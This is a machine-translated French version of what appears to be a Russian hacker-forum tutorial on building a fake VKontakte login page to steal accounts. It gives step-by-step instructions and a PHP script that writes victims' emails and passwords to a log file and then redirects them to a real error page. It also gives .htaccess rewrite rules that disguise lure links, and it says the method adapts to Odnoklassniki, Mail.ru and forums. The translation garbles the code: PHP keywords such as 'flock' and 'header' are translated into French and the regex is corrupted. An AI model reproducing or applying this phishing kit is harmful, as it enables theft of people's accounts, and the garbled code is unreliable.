This page has been robot translated, sorry for typos if any. Original content here.

Faux à la hâte

[iNtrO]

Il n'y avait rien à faire, c'était dans la soirée ... En fait, mon premier article (le premier sur l'anti-chat) m'a fait comprendre que, dans la section achat / vente / échange / rouleau, il existe un sujet dans lequel un démon voleur vendait autant de faux 10 vmz, et souvent invité à créer l'un ou l'autre faux ...
Je vais vous dire dans un article comment obtenir un faux universel presque sous tout ce qui est usé! Je vais montrer sur l'exemple de faux vkontakte.

[SeaRchINg]

La première chose dont nous avons besoin est donc de choisir une ressource pour les victimes et de rassembler toutes les informations dont nous avons besoin, et nous n'avons besoin que d'une copie de certaines pages. Nous allons à vkontakte.ru via Operu (!) . Nous appuyons sur le bouton de saisie, accédons à login.php, le prenons et le prenons comme notre faux index. Nous appuyons sur l'opéra: Fichier -> Enregistrer sous -> Dans la boîte de dialogue ouverte sous le nom que nous avons sélectionné (par défaut, il existe une archive Web ....) " Fichier HTML avec images ", puis allez à la colonne Nom du fichier et écrivez l' index (ou login.htm - selon la page)


Ensuite, entrez des données irréalistes et accédez à la page sur laquelle elles sont écrites.
Cette adresse email n'est pas enregistrée ou le mot de passe est incorrect.
Nous le conservons de la même manière, alors au lieu d'index, nous écrivons mal .
Ensuite, nous conduisons la phrase Vkontakte.ru sur Google.ru, cliquez sur le lien Additional Results from vkontakte.ru ” et recherchez un élément lié au contact eror ... Sur la deuxième page, j'ai trouvé VKontakte | Erreur (http://vkontakte.ru/blank.php?code=10)- rappelez-vous, nous avons besoin de ce lien
Utilisez, nous avons déjà tout ce dont nous avons besoin pour les faux.

[CoDiNg]

Taxe, nous examinons maintenant le formulaire de connexion. Ouvrez notre fichier index.html et recherchez le formulaire de connexion.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <type d'entrée = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellpacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "grey"> E-mail: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "grey"> Mot de passe: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  type = "case à cocher" name = "expire" id = "expire" value = "1" /> <small> Ordinateur extraterrestre </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
De là, nous nous souvenons de 3 choses:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = " pass " value = "" id = "pass" size = "25" />
C'est dans ces 3 choses que la première partie de l'unicité est contenue, sur n'importe quel réseau social ou email ou ailleurs, partout où le formulaire de saisie (champs) sera dans cette vue (enfin, seul le nom des champs se réveille), par exemple,
<input id = "field_password" value = "" style = "width: 170px;" type = "mot de passe" size = "20" name = " st.password ">
Par exemple, le nom des champs est simplement différent, les éléments de la conception, mais la fonction est la même pour tout le monde.
Maintenant, nous créons un fichier php, et l'appelons par exemple login.php , son contenu:

Code PHP:
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- + + +.) ( [0-9a-z [2.4,4 [ / i] i " , $ _POST [ " email " ]) &&! vide ( $ _POST [ " mot de passe " ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'password' ]. "\ n" );
en-tête ( "Emplacement: http: //" );
} else {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
En fait, nous examinons le script, quelques parchemins, mais il s’agit d’un faux normal, sa fonctionnalité:
Sauvegarde des variables transmises, leur vérification, redirige en fonction de la vérification.

Et maintenant, revenons à ces 3 lignes:
<form method = "post" name = "login" id = "login" action = " login.php ">
Ici, nous avons tout en ordre, le nom de notre script coïncide avec le nom de leur script, mais il ne coïncide pas. Ensuite, nous le remplaçons ou nous le renommons.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "mot de passe" name = "pass" value = "" id = "pass" size = "25" />
De là, nous avons besoin de name = " email " et name = " pass "
Collez-les dans notre script au bon endroit.
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- + + +.) ( [0-9a-z [2.4,4 [ / i] i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
en-tête ( "Emplacement: http: //" );
} else {
en-tête ( "Emplacement: http: //" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Celui qui n'a pas remarqué est $ _POST ['email'] et $ _POST ['pass']

Ensuite, nous examinons le craquement, ici la fonction IF ELSE est définie, et pregmatch, c’est-à-dire que si le champ e-mail correspond à l’e-mail (nick@mylo.ru, et non tel que piloté), et le champ mot de passe n’est pas vide, la première redirection est exécutée, si le courrier électronique ne correspond pas ou le champ de passage est vide, puis la deuxième redirection. Il s’ensuit que si Chel a introduit du savon et quelque chose de similaire à un laissez-passer, nous l’avons jeté sur la page avec eror http://vkontakte.ru/blank.php?code=10 , et s’il est entré avec des ordures (ici il nous fallait copie de la page bad.html? lorsque nous avons entré des données incorrectes), nous les rejetons, c’est-à-dire que nous avons entré bad.htm.

Code PHP:
  <? php
 

/ *
##############
# by_NoNameZ #
############
* /
$ f = fopen ( "log.txt" , "at" );
troupeau ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ (( 0 0a-z- + + +.) ( [0-9a-z [2.4,4 [ / i] i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
en-tête ( "Emplacement: http://vkontakte.ru/blank.php?code=10" );
} else {
en-tête ( "Location: bad.htm" );
}
troupeau ( $ f , 3 );
fclose ( $ f );
?>
Nous économisons. Nous remplissons toute la merde sur le serveur (login.php, index.htm + dossier avec fichiers, bad.htm + dossier avec fichiers), créons le fichier log.txt (je vous conseille de choisir votre nom unique. N'oubliez pas de modifier le script), définissez-le sur lui chmod777.

3) une petite mise à jour ...

Cette mise à jour est très appropriée pour SI. À la racine du FTP, nous créons un fichier .htaccess avec le contenu suivant:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION !!!
! index \ .htm - fait référence à cette redirection de fichier, si vous avez un faux, disons login.html. en conséquence, vous devez renommer l’index en login.

Taxe, ce fichier nous donne un lien plus qualitatif gazliv, à savoir:
Votre fak.ru / n'importe quel texte, en connaissant la structure de liens du faux sogda, par exemple un contact, nous pouvons le faire:


votre fiction.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
et vparit sur ICQ))) d'accord. moins visible maintenant faux))

C'est tout

[La fin] En fait, ce qui est unique et le fait que vous puissiez aller à vos camarades de classe, également enregistrer la page, entrer des variables, remplacer les URL (je donne immédiatement http://odnoklassniki.ru/dk?st.cmd=error) et le tour est joué, absolument. allez à Mayil.ru, sauvegardez les variables et remplacez le tout))) La seule chose dont vous pourriez avoir besoin est la créativité, nous ne sauverons pas la page principale, mais la page de connexion. Vous pouvez également créer n'importe quel forum si vous souhaitez obtenir un compte ( envoyer à pm
<a href="feik"> lien vers un sujet </a>
, et en faux indiquent ce sujet pour la redirection.